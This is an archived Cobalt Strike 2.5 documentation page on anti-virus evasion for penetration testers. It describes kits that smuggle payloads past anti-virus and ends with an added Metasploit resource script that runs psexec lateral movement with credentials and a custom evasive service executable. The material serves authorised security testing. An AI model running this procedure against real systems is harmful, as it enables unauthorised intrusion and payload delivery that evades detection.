Notice: There is a serious security flaw in Cobalt Strike 3.5 and below (2.x is deprecated and assumed affected as well). Please read the advisory for more details.


Notice: This content is for Cobalt Strike 2.5. It's kept here for users working with the old version. The homepage for the latest Cobalt Strike is at

Anti-virus Evasion

Anti-virus evasion is a problem every penetration tester has to deal with. Any file that touches disk or loads in a browser is an opportunity for anti-virus to catch you.

To get past anti-virus, Cobalt Strike re-implements several key Java attacks and uses a proprietary process to generate Windows executables. Unmodified, these artifacts get past many anti-virus products. Evasion is not guaranteed, though: anti-virus signatures change over time, so test an artifact against the product you expect to meet before you rely on it.

If a Cobalt Strike artifact does not get past an anti-virus product, you have the option to modify it and make Cobalt Strike use your modified artifact. Source code to Cobalt Strike's proprietary artifacts is available to licensed users in the Cobalt Strike Arsenal. The Arsenal contains the Applet Kit and the Artifact Kit.

The Applet Kit is source code to Cobalt Strike's Java Injector, the Java Signed Applet attack, and Smart Applet attacks. You may modify the injector payload, sign the applet attack with your code signing certificate, or add new exploits to the smart applet attack. The supplied Cortana script integrates your modifications into the auto-exploit server and the Java attacks under the Attacks -> Web Drive-by menu.

The Power Applet is an alternate implementation of Cobalt Strike's applet attacks. This applet uses PowerShell to inject a Cobalt Strike payload into memory. Use the supplied Cortana script to make Cobalt Strike use the Power Applet over the standard Applet Kit.

The Artifact Kit is a source code framework to build executables that smuggle payloads past anti-virus products. Cobalt Strike uses the Artifact Kit to produce executables for features located in the Attacks menu. The Artifact Kit ships with three evasion techniques plus a template that you may use to build a new technique. Each technique includes a Cortana script to make Cobalt Strike use it over the default.

Licensed Cobalt Strike users may access the arsenal through Help -> Arsenal.

Metasploit Framework Considerations

When you use a Metasploit® Framework exploit or attack, know that the Metasploit® Framework's artifacts are well understood by most anti-virus products and will get caught.

You should always use Cobalt Strike's Java attacks over the Metasploit® Framework's built-in Java attacks. If a Metasploit® Framework module generates an executable, specify an Artifact Kit executable to get past anti-virus.

Metasploit® Framework modules that generate an executable usually accept an EXE::Custom advanced option. Use Attacks -> Packages -> Windows EXE to generate the right type of executable for the module, then set EXE::Custom to the path of that file. Many privilege escalation exploits (exploit/windows/local/* in the Metasploit® Framework) accept custom executables.

Cobalt Strike generates an Artifact Kit Windows Service Executable when you use Cobalt Strike's dialogs for lateral movement (e.g., [host] -> Login -> psexec). If you launch the Metasploit® Framework's psexec or current_user_psexec modules through the module browser or console, you must set EXE::Custom yourself, and point it at a service executable, because these modules install and run the file as a Windows service.
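The following Metasploit resource script is an added example of the EXE::Custom procedure above; it is not part of the original page and not Cobalt Strike's or Metasploit's own code. It assumes you have already exported a service executable from Attacks -> Packages -> Windows EXE to the path shown, and that the listener that executable calls back to is already running in Cobalt Strike. The target address, credentials and file path are constructed for illustration.

```msf
# psexec-artifact.rc (assumed file name); run with: msfconsole -q -r psexec-artifact.rc
# Weak setting: leaving EXE::Custom unset makes psexec upload the executable
# Metasploit generates itself, which anti-virus products know well.
use exploit/windows/smb/psexec
set RHOST 10.10.10.5                      # constructed target address
set SMBDomain CORP                        # constructed credential
set SMBUser administrator                 # constructed credential
set SMBPass 'Password1'                   # constructed credential
# Corrected setting: upload the Artifact Kit service executable instead.
# psexec installs this file as a Windows service, so it must be the service
# EXE output of the Windows EXE dialog, not a plain EXE.
set EXE::Custom /root/artifacts/beacon_svc.exe   # assumed path to your exported file
# The artifact carries its own payload and connects back to the Cobalt Strike
# listener that is already running, so do not start a second handler here.
set DisablePayloadHandler true
exploit -j
```

The same two settings, EXE::Custom and DisablePayloadHandler, apply to exploit/windows/local/current_user_psexec and to the privilege escalation modules that accept a custom executable; only the module name and its target options change.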